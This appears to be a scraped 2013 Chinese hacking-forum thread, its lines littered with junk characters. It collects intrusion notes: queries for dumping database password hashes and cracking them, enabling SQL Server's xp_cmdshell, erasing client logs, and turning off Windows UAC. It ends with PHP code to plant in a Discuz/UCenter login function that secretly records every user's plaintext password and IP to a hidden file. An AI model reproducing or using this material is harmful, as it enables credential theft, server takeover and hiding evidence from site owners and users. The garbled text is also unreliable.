7 ~6 J) }. o. {4 z. v4 h/ K( p各种类型数据库抓HASH破解最高权限密码!: m3 R4 {* X3 A) K0 o! d& m/ @
1.sql server2000
+ s- z7 ]2 X5 a( N3 O# [SELECT password from master.dbo.sysxlogins where name='sa'
, T9 D) D* C$ S$ C u" X% o, d4 ^0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412 m3 y- o+ m1 Y' \. x
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A, N1 ], R* \# ^' I! D
3 k, z" a" e9 O1 B1 y
0×0100- constant header
4 L- r5 M: N5 Q& S, h% x34767D5C- salt4 {7 v+ y! O/ K0 d+ ~
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
$ y. v/ ~- z% c$ m: A+ a2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash6 z& u! b. W Z
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
& v" Q" U6 D. ^& I; E! PSQL server 2005:-2 T3 t% N) q7 a3 \+ i5 x( K/ c
SELECT password_hash FROM sys.sql_logins where name='sa'5 P% S& E1 W% {$ N+ E/ _$ F
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
- g# Q( Z' T+ I9 Z! H7 u( N0×0100- constant header. S, i3 i$ E! |4 U& T& }' L. |5 u
993BF231-salt2 M2 _) P) i9 S$ J! }
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash+ Y; h& k d( j* f- V. D2 t% T+ _+ r! W
crack case sensitive hash in cain, try brute force and dictionary based attacks.
) e9 y8 u. V& q4 y8 Y- [
( @ d8 b) u6 q9 r3 Gupdate:- following bernardo’s comments:-
5 _" F9 o" J4 x* N+ vuse function fn_varbintohexstr() to cast password in a hex string.% @( ^9 ~9 x8 J" ?, y& y
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins P' s; c! z. v
- f! {6 R# O) J! r/ j
MYSQL:-1 z% W; ?7 a* V) a- {
% ^5 w5 G1 ? e. o
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
5 ~2 T& q3 W" B8 T8 X
4 k) M! B) `; t- v! M/ C; C*mysql < 4.1
2 G* k8 K$ }/ r4 ?4 S$ G. _4 k0 D" [) ]! g
mysql> SELECT PASSWORD(‘mypass’);
: t( Q, D& Q# S+——————–+8 }2 ^# f* p) U( B$ I j% _) }
| PASSWORD(‘mypass’) |
6 O8 u$ ~: B2 k( ^ g* V4 n+——————–+# ~/ m/ {$ Q6 E3 R" p7 `
| 6f8c114b58f2ce9e |' I" Q0 d1 }3 @. L$ H. n
+——————–+) P" ~$ A) N% _/ n$ Z# m" s
7 u) X8 W, I4 @9 r. h*mysql >=4.1
3 l& b, @7 o5 {1 k
, Y" M4 |& `1 ~2 |mysql> SELECT PASSWORD(‘mypass’);
' X2 Z9 y. ]% M& q! C% R X) s+——————————————-+/ C: y3 ^$ A* Q( z9 z
| PASSWORD(‘mypass’) |5 f/ q0 x7 W4 K. n2 U) Y5 N
+——————————————-+
% S: R L S S5 |) z| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
2 c: C4 G. V: Y; c$ j% G8 t+——————————————-+
8 i" ~- I" L: N. x: L
+ y. l% I1 |9 b8 x5 _Select user, password from mysql.user
% U" G2 e* }6 q5 ]- G8 z1 B! }The hashes can be cracked in ‘cain and abel’, F% J5 a* _( n$ h5 K6 Z: P: _
+ h# E4 H6 c0 d. @$ aPostgres:-" `6 {7 M. J/ N# d; s; L
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)* q1 F3 i0 J) n" ]" Q; Z
select usename, passwd from pg_shadow;
% {6 l. Y) l' ]1 Z8 Pusename | passwd
- ~, f% j/ t, c( ~& }——————+————————————-4 g0 G) f4 |' }1 S0 E# y# v* \
testuser | md5fabb6d7172aadfda4753bf0507ed4396
2 e R- f2 l0 C9 w8 o" [8 D* `use mdcrack to crack these hashes:-* E r [/ C+ P: U' Y
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396$ T8 N- _! q0 i* T1 r
( S" ~1 u" J) x
Oracle:-
- G9 x: t) q b( m( d5 sselect name, password, spare4 from sys.user$
& D8 s' U e4 ]6 hhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g8 a# D; j, P& p4 H6 i: f5 c
More on Oracle later, i am a bit bored….
: ~) ^% r6 M. V- c5 s" C! u0 p5 H7 C: z( H* B
4 i9 F( M1 t1 P3 y- o
在sql server2005/2008中开启xp_cmdshell
, W+ c9 o: J7 ?+ c2 [-- To allow advanced options to be changed.
! p% P- q4 b% fEXEC sp_configure 'show advanced options', 10 a4 `% _& z5 G; u7 N% M. U+ F% Y
GO4 _- U) P% ^6 K2 _/ z
-- To update the currently configured value for advanced options.- I& t. c6 j/ c: e
RECONFIGURE9 m; j$ s2 _$ D; N; x+ f7 L
GO9 _, `6 `- r/ E$ N5 p4 |
-- To enable the feature.8 o: s, D+ b6 a3 J4 |
EXEC sp_configure 'xp_cmdshell', 1
. ?6 |- J& |$ zGO
* }3 J1 W7 n& C" M/ [: f9 C-- To update the currently configured value for this feature.) d! k: w8 i/ i" t) A; o, t e
RECONFIGURE/ J* X K" ~& m/ }( s7 j0 p
GO2 M5 ~1 v- ?! V
SQL 2008 server日志清除,在清楚前一定要备份。7 g! Q; ^3 c! ^' q4 b1 Q% m
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
: `2 Y. ]2 j2 a" G3 W+ PX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
: D: A: U7 S7 [
6 B0 i4 z- S2 W) F对于SQL Server 2008以前的版本:
" V+ n/ b/ A( P3 bSQL Server 2005:
- d# f d$ h2 c! M. V1 x+ ^! M删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat1 C. Y' O: I6 s, q
SQL Server 2000:
9 P3 B" Q( [7 k; B0 D$ F清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。" p8 F# g" y) z0 K6 m
/ J$ o& X. ~5 ]" e1 J* K# r
本帖最后由 simeon 于 2013-1-3 09:51 编辑
& h: R$ S9 y3 }8 p
$ M. T ^) r5 m' `. ~
* \( D) X" _9 T! c" K$ ?/ Vwindows 2008 文件权限修改
+ T7 C/ @: H9 ]1 ^3 \& v1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
6 j$ X. c6 n3 n |* H: B, K3 `2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98 \ L5 S( s0 P. r" E/ p. e! @
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
6 ~+ e k$ q! t0 P. _7 |7 t- O; X3 r K
Windows Registry Editor Version 5.009 {9 s l9 R" J# j$ I
[HKEY_CLASSES_ROOT\*\shell\runas]
& Y; D, [4 [! u6 R@="管理员取得所有权"1 }* Q" C" _1 U. R2 n6 h
"NoWorkingDirectory"=""
; b) V' R# \% j' \0 |- Q. \) P) d( t[HKEY_CLASSES_ROOT\*\shell\runas\command]
2 k4 j* j" K8 y' \2 B+ [@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# u. S9 f9 J! C% N" x) P" i: Z8 ?1 h
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 w; E! ~* v% ^% c; N
[HKEY_CLASSES_ROOT\exefile\shell\runas2]4 y& N' M6 G: c4 X+ c% f4 g! N$ x
@="管理员取得所有权"" L2 f& t! H! H* T
"NoWorkingDirectory"=""
' b4 j3 O/ z' X- u& j2 g[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
" g1 D4 t4 s5 U1 s+ L@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
% G6 G5 h5 p& ]7 ~+ q7 B1 s"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' S9 {2 G2 }* g4 a1 y9 N
; d- X) u4 C: f0 R/ q8 j[HKEY_CLASSES_ROOT\Directory\shell\runas] t- D' }1 X. q
@="管理员取得所有权"" i; j/ v/ x1 k0 z( Z5 B
"NoWorkingDirectory"=""6 z: C6 K8 ? D0 V" F1 Y, p
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
2 z! c: H5 \6 l3 B) X; i) d8 ~- k@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"4 ~. B* \% G, U& _2 k, c* @. l' R
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
% f2 s* H9 p7 s
6 Y/ {/ @3 e2 O4 K5 x( W( w9 J4 y9 P- F6 l. H
win7右键“管理员取得所有权”.reg导入
. |: z7 w. _0 ^: w1 _二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
% E) A3 p6 ?6 J2 b8 @1、C:\Windows这个路径的“notepad.exe”不需要替换 q/ C+ v- K2 C
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
" {; f7 m# P/ S, X6 p% @3、四个“notepad.exe.mui”不要管& L7 ^; q; z% O9 h8 F* i
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和$ v( V3 F+ t3 j% U, _! X
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”: I9 s$ d- o: j2 J" u
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,- o$ i9 ]2 Y! p( B( ?1 |9 N8 f
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。4 P0 Y# R6 E0 `4 e9 c! i: p) _3 `
windows 2008中关闭安全策略: 2 u$ {- B( c! E6 ^- V
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
. F1 r! w, T: R" O" {& z9 F! h9 L修改uc_client目录下的client.php 在
1 f; K$ P) J, r5 Ifunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
) y. f8 e, Y& q# M下加入如上代码,在网站./data/cache/目录下自动生成csslog.php, w: O( e, x0 s+ Q) `" d* F
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw6 U( _0 \+ ^) U; M" B( [9 ~- f
if(getenv('HTTP_CLIENT_IP')) {
& D# y* P$ V; f! p; g/ j/ R5 M! t$onlineip = getenv('HTTP_CLIENT_IP');1 e7 X+ h& i( ]+ \! ~' t) o2 ^; D( U
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {" A/ m% z; N; H/ c }& V0 W/ G; S5 T0 k
$onlineip = getenv('HTTP_X_FORWARDED_FOR');+ C0 S2 j; P7 [
} elseif(getenv('REMOTE_ADDR')) {
1 {+ x# o. b2 }- I' M' K$ A1 O5 r8 G; r$onlineip = getenv('REMOTE_ADDR');
6 ?# X/ V3 D5 o} else {8 V. Z. T4 h2 O6 l) m2 R8 i; Y. _
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$ O& b+ T: z- N2 l% K4 A6 D}: \, G6 u7 H& X" z
$showtime=date("Y-m-d H:i:s");( t8 y' h2 p& S, e
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
3 e. \1 N& O* m! g& B $handle=fopen('./data/cache/csslog.php','a+');
( ]5 c" o/ b2 R& ^8 `- i) g( \ $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对